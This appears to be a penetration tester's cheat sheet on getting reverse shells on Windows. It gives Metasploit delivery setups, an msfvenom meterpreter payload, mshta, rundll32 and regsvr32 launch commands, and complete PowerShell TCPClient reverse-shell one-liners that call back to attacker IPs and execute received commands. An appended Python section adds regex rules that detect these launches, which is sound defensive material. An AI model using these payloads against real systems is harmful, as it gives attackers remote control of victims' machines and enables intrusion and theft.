Windows reverse shells (no Windows Defender evasion)

Prologue

At your current speed you can only stay where you are. If you want to get somewhere else, you must run at least twice as fast as that.

Mind map and tutorials

One-liner reverse shell & Reverse Shell In Windows

Koadic: getting a session past Defender

Windows

mshta.exe

What worked

use exploit/windows/misc/hta_server
set srvhost 10.100.19.19
set lhost 10.100.19.19
set SRVPORT 53
exploit

mshta.exe http://10.100.19.19:53/tA7YRzR.hta

What failed

Set up the payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.19.19 LPORT=53 -f raw > shellcode.bin

cat shellcode.bin | base64 -w 0 > out.txt
(base64-encodes shellcode.bin)


handler -H 10.100.19.19 -P 53 -p windows/meterpreter/reverse_tcp

mshta.exe http://10.100.19.19/CACTUSTORCH.hta

Pitfall

The handler cannot be set up as exploit/multi/handler

rundll.exe

use windows/smb/smb_delivery

set srvhost 192.168.123.123

rundll32.exe \\192.168.1.109\vabFG\test.dll,0

Regsvr32.exe

use exploit/multi/script/web_delivery
msf exploit (web_delivery)>set target 3
msf exploit (web_delivery)> set payload windows/meterpreter/reverse_tcp
msf exploit (web_delivery)> set lhost 192.168.1.109
msf exploit (web_delivery)>set srvhost 192.168.1.109
msf exploit (web_delivery)>exploit

powershell & powercat

nc -lnvp 4455

powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("192.168.123.123",4455);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
This one failed to call back
---
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.123.123',4455);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
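From the defender's side, every launch above (mshta fetching a remote .hta, rundll32 loading a DLL from a UNC share, regsvr32 pulling a remote .sct via scrobj.dll, and the PowerShell TCPClient/iex one-liners) leaves a recognisable process command line. The following is an added detection example, not code from the original post; it assumes command lines in the shape of Sysmon Event ID 1 / Security 4688 records, and the sample events are constructed (the regsvr32 line is the form web_delivery target 3 produces, not a value from the post).

```python
import re

# One regex per technique from the post; command-line shapes are assumptions.
RULES = {
    "mshta_remote_hta": re.compile(r"\bmshta(?:\.exe)?\s+https?://", re.I),
    "rundll32_unc_dll": re.compile(r"\brundll32(?:\.exe)?\s+\\\\[^\\\s]+\\", re.I),
    "regsvr32_remote_sct": re.compile(
        r"\bregsvr32(?:\.exe)?\b.*/i:https?://.*\bscrobj\.dll\b", re.I),
}
# The PowerShell one-liners share these traits; two or more together is flagged.
PS_IMAGE = re.compile(r"\bpowershell(?:\.exe)?\b", re.I)
PS_INDICATORS = {
    "hidden_window": re.compile(r"-(?:W|WindowStyle)\s+Hidden\b", re.I),
    "exec_bypass": re.compile(r"-(?:Exec|ExecutionPolicy)\s+Bypass\b", re.I),
    "non_interactive": re.compile(r"-(?:NonI|NonInteractive)\b", re.I),
    "raw_tcp_client": re.compile(r"System\.Net\.Sockets\.TCPClient", re.I),
    "invoke_expression": re.compile(r"\b(?:iex|Invoke-Expression)\b", re.I),
}

def classify(cmdline):
    """Return the names of the techniques one process command line matches."""
    hits = [name for name, rx in RULES.items() if rx.search(cmdline)]
    if PS_IMAGE.search(cmdline):
        traits = [t for t, rx in PS_INDICATORS.items() if rx.search(cmdline)]
        if len(traits) >= 2:
            hits.append("powershell_reverse_shell:" + "+".join(traits))
    return hits

def scan(events):
    """events: iterable of (event_id, cmdline); returns only flagged events."""
    flagged = []
    for eid, cmd in events:
        hits = classify(cmd)
        if hits:
            flagged.append((eid, hits))
    return flagged

# Constructed process-creation events: four from the post's techniques, three benign.
SAMPLE_EVENTS = [
    (1, r"mshta.exe http://10.100.19.19:53/tA7YRzR.hta"),
    (2, r"rundll32.exe \\192.168.1.109\vabFG\test.dll,0"),
    (3, r"regsvr32 /s /n /u /i:http://192.168.1.109:8080/payload.sct scrobj.dll"),
    (4, "powershell -nop -c \"$client = New-Object System.Net.Sockets.TCPClient("
        "'192.168.123.123',4455);$sendback = (iex $data 2>&1 | Out-String)\""),
    (5, r"rundll32.exe shell32.dll,Control_RunDLL"),         # local DLL, benign
    (6, r"powershell.exe -NoProfile -Command Get-Process"),  # no suspicious traits
    (7, r"mshta.exe C:\Windows\Temp\local.hta"),             # local .hta, not flagged
]

if __name__ == "__main__":
    for eid, hits in scan(SAMPLE_EVENTS):
        print(eid, hits)
```

The PowerShell rule counts traits rather than matching one fixed string, so the failed `-W Hidden -Exec Bypass` variant and the working `-nop -c` variant above are both caught.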

References

https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/

https://hackersinterview.com/oscp/reverse-shell-one-liners-oscp-cheatsheet/